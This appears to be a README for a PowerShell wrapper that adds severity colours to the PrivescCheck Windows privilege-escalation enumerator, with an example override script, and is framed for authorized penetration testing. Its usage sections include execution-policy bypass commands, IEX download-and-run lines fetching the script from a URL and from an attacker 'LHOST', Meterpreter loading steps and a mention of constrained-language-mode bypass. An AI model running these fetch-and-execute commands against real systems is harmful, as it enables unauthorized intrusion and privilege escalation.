A color output wrapper for PrivescCheck by @itm4n.
Intercepts PrivescCheck's terminal output functions and replaces them with ANSI severity-colored rendering. All detection logic is unmodified. The wrapper introduces no new enumeration capability.
PrivescCheck assigns a severity level (High, Medium, Low, Info, None) to every check result but outputs everything in plain text. During a time-pressured engagement — or in a WinRM session with a narrow terminal — identifying actionable findings in a long plain-text scroll is slow.
This wrapper replaces the two output functions (Write-CheckBanner, Write-CheckResult) after the original script loads, substituting color-coded rendering without touching any detection code. The approach is a function-level override in the global scope rather than a source patch, so it remains compatible with future PrivescCheck releases without modification.
| Tag | Color | Meaning |
|---|---|---|
| `[HIGH]` | Red | Immediate privilege escalation vector |
| `[MED]` | Yellow | Exploitable misconfiguration |
| `[LOW]` | Cyan | Low-confidence or informational finding |
| `[PASS]` | Green | Check completed, no issue found |
| keyword | Magenta | Sensitive string highlighted inline (privileges, credentials, paths) |
```powershell
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor"
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended"
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended -SeverityFilter Medium"
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended -Report out -Format HTML"
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kowalski-analysis/PrivescCheck-Color/main/Invoke-PrivescCheckColor.ps1'); Invoke-PrivescCheckColor -Extended -SeverityFilter Medium
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -SourceScript C:\tools\PrivescCheck.ps1"
```

| Parameter | Type | Description |
|---|---|---|
| `-Extended` | Switch | Enable extended checks |
| `-Audit` | Switch | Enable audit checks |
| `-Experimental` | Switch | Enable experimental checks |
| `-Risky` | Switch | Enable checks that may trigger endpoint protection |
| `-Force` | Switch | Run when executing as administrator |
| `-Report` | String | Write results to a report file with this prefix |
| `-Format` | String | Report format: TXT, HTML, CSV, XML |
| `-SeverityFilter` | String | Suppress results below this level: High, Medium, Low, Info, None |
| `-NoColor` | Switch | Disable ANSI escape sequences |
| `-NoLogo` | Switch | Suppress the header block |
| `-SourceScript` | String | Path or URL to a specific PrivescCheck.ps1 |
```powershell
upload Invoke-PrivescCheckColor.ps1
. .\Invoke-PrivescCheckColor.ps1
Invoke-PrivescCheckColor -Extended -SeverityFilter Medium
```

Set a session timeout before running — default 15s is insufficient:

```text
msf6 > sessions -t 300 -i 1
meterpreter > load powershell
meterpreter > powershell_import /local/path/Invoke-PrivescCheckColor.ps1
meterpreter > powershell_execute "Invoke-PrivescCheckColor -Extended -SeverityFilter Medium"
```
```powershell
Get-Content .\Invoke-PrivescCheckColor.ps1 | Out-String | Invoke-Expression
IEX (New-Object Net.WebClient).DownloadString('http://LHOST/Invoke-PrivescCheckColor.ps1'); Invoke-PrivescCheckColor -SeverityFilter High
```

PrivescCheck calls `Write-CheckBanner` and `Write-CheckResult` for every completed check. After loading the original script, this wrapper overrides both functions in the global PowerShell scope. The new implementations:

- Read the `.Severity` property already set by PrivescCheck's detection logic
- Map it to an ANSI color code
- Scan property values for a fixed list of sensitive strings (privilege names, credential keywords, writable system paths) and highlight matches in a distinct color
- Apply the `-SeverityFilter` threshold to suppress low-value output during triage
- Collect all results and print a summary with per-severity counts and a named list of High/Medium findings at the end
The detection functions, severity assignments, check registry, and all enumeration logic are untouched.
The following classes of strings are highlighted in result output when matched:

- Exploitable privileges: `SeImpersonatePrivilege`, `SeAssignPrimaryTokenPrivilege`, `SeTcbPrivilege`, `SeBackupPrivilege`, `SeRestorePrivilege`, `SeDebugPrivilege`, `SeTakeOwnershipPrivilege`, `SeLoadDriverPrivilege`
- Misconfiguration indicators: `AlwaysInstallElevated`, `Unquoted`, `AutoRun`, `Autologon`, `DefaultPassword`
- Credential keywords: `password`, `cleartext`, `plaintext`, `NTLM`, `SAM`, `LSA`, `credential`, `token`
- High-value identities: `NT AUTHORITY\SYSTEM`, `BUILTIN\Administrators`, `Everyone`
- Sensitive paths: `C:\Windows\System32`, `C:\Windows\SysWOW64`, `C:\Program Files\`
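The override mechanism described above (global-scope replacement of `Write-CheckResult`, severity-to-color mapping, keyword highlighting, the `-SeverityFilter` threshold and the end-of-run summary) as an added, self-contained example. This is not code from PrivescCheck-Color or from PrivescCheck itself: a stand-in `Write-CheckResult` plays the part of the original function so the example runs on its own, and the result object shape (`.Name`, `.Severity`, `.Description`), the variable names and the sample findings are assumptions constructed for this illustration.

```powershell
# Added example, not code from PrivescCheck-Color or from PrivescCheck itself.
# A stand-in Write-CheckResult plays the part of the original function, then a
# global-scope function of the same name replaces it with severity-colored
# output, keyword highlighting, a severity threshold and an end-of-run summary.
# Result object shape, variable names and sample findings are assumptions.

# Stand-in for the original: declared global: to mirror a dot-sourced PrivescCheck.
function global:Write-CheckResult {
    param([Parameter(Mandatory = $true)] $Result)
    Write-Host ("{0} [{1}] {2}" -f $Result.Name, $Result.Severity, $Result.Description)
}

$esc = [string][char]27
$global:ColorEnabled     = $true      # $false gives the -NoColor style plain-text fallback
$global:SeverityFilter   = 'Medium'   # results below this level are not printed
$global:CollectedResults = @()

function Get-Ansi([string] $Code) {
    if ($global:ColorEnabled) { return ($esc + '[' + $Code + 'm') }
    return ''
}

# Color and tag tables follow the README: High red, Medium yellow, Low cyan,
# pass green, highlighted keywords magenta.
$global:SeverityColor = @{ 'High' = (Get-Ansi 31); 'Medium' = (Get-Ansi 33); 'Low' = (Get-Ansi 36); 'Info' = (Get-Ansi 32); 'None' = (Get-Ansi 32) }
$global:SeverityTag   = @{ 'High' = 'HIGH'; 'Medium' = 'MED'; 'Low' = 'LOW'; 'Info' = 'PASS'; 'None' = 'PASS' }
$global:SeverityRank  = @{ 'High' = 4; 'Medium' = 3; 'Low' = 2; 'Info' = 1; 'None' = 0 }
$global:Magenta = Get-Ansi 35
$global:Reset   = Get-Ansi 0

# A subset of the README's highlight list; the full list works the same way.
$global:Keywords = @('SeImpersonatePrivilege', 'SeBackupPrivilege', 'AlwaysInstallElevated',
                     'password', 'NT AUTHORITY\SYSTEM', 'C:\Windows\System32')

# Wrap every keyword match in magenta, then switch back to the line's base color.
# -replace is case-insensitive, so "Password" is matched as well as "password".
function Add-KeywordHighlight([string] $Text, [string] $BaseColor) {
    foreach ($kw in $global:Keywords) {
        # '$0' in single quotes is the .NET whole-match reference, not a PowerShell variable.
        $Text = $Text -replace [regex]::Escape($kw), ($global:Magenta + '$0' + $global:Reset + $BaseColor)
    }
    return $Text
}

# The override. Same name, global scope: PrivescCheck's own calls now resolve here.
function global:Write-CheckResult {
    param([Parameter(Mandatory = $true)] $Result)
    $sev = [string] $Result.Severity
    if (-not $global:SeverityRank.ContainsKey($sev)) { $sev = 'None' }
    $global:CollectedResults += , $Result        # keep everything for the summary
    if ($global:SeverityRank[$sev] -lt $global:SeverityRank[$global:SeverityFilter]) { return }
    $color = $global:SeverityColor[$sev]
    $body  = Add-KeywordHighlight -Text ("{0}: {1}" -f $Result.Name, $Result.Description) -BaseColor $color
    Write-Host ($color + '[' + $global:SeverityTag[$sev] + '] ' + $body + $global:Reset)
}

# Per-severity counts plus the High/Medium findings listed by name.
function Show-CheckSummary {
    Write-Host ''
    foreach ($sev in 'High', 'Medium', 'Low', 'Info', 'None') {
        $n = @($global:CollectedResults | Where-Object { "$($_.Severity)" -eq $sev }).Count
        Write-Host ($global:SeverityColor[$sev] + ('{0,-6} {1}' -f $sev, $n) + $global:Reset)
    }
    $actionable = $global:CollectedResults | Where-Object { $global:SeverityRank["$($_.Severity)"] -ge $global:SeverityRank['Medium'] }
    foreach ($r in $actionable) { Write-Host ('  - ' + $r.Name + ' (' + $r.Severity + ')') }
}

# Constructed sample results standing in for what PrivescCheck's checks would emit.
$sample = @(
    (New-Object PSObject -Property @{ Name = 'Token privileges'; Severity = 'High';   Description = 'SeImpersonatePrivilege is present in the current token' }),
    (New-Object PSObject -Property @{ Name = 'Installer policy'; Severity = 'Medium'; Description = 'AlwaysInstallElevated is set' }),
    (New-Object PSObject -Property @{ Name = 'Service paths';    Severity = 'Low';    Description = 'Binary located under C:\Windows\System32' }),
    (New-Object PSObject -Property @{ Name = 'Hotfixes';         Severity = 'None';   Description = 'Nothing to report' })
)
foreach ($r in $sample) { Write-CheckResult -Result $r }   # Low and None fall below the threshold and are not printed
Show-CheckSummary
```

Run it with `. .\example.ps1` in an ANSI-capable terminal; the two suppressed results still appear in the summary counts because collection happens before the threshold check, which is the behaviour a triage summary needs. Setting `$global:ColorEnabled = $false` before the color tables are built empties every escape sequence, which is how a plain-text fallback for a legacy console is obtained without a second rendering path.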
| Environment | Status |
|---|---|
| PowerShell 2.0+ | Supported (PSv2 compatibility maintained for CLM bypass) |
| PowerShell 5.1 | Supported |
| PowerShell 7.x | Supported |
| WinRM / Evil-WinRM | Supported |
| Meterpreter powershell extension | Supported (set session timeout) |
| ANSI-capable terminal (Windows Terminal, most Linux PTYs) | Full color output |
| Legacy cmd.exe console on older Windows | Automatic fallback to plain text |
```text
PrivescCheck-Color/
├── Invoke-PrivescCheckColor.ps1   Main script
├── README.md
├── CHANGELOG.md
├── LICENSE
└── .gitignore
```
This tool is for authorized penetration testing and security research only. Do not use against systems without explicit written authorization. The author accepts no liability for misuse.
All vulnerability detection, enumeration logic, severity classification, and the PrivescCheck framework are the work of Thomas Lacroix (@itm4n).
- Original project: https://github.com/itm4n/PrivescCheck
- Original license: BSD 3-Clause
This wrapper was written by kowalski-analysis for pentesting certification exam preparations and authorized engagement use. If you find it useful, consider starring the original PrivescCheck repository.
BSD 3-Clause. See LICENSE. Inherited from the original PrivescCheck project.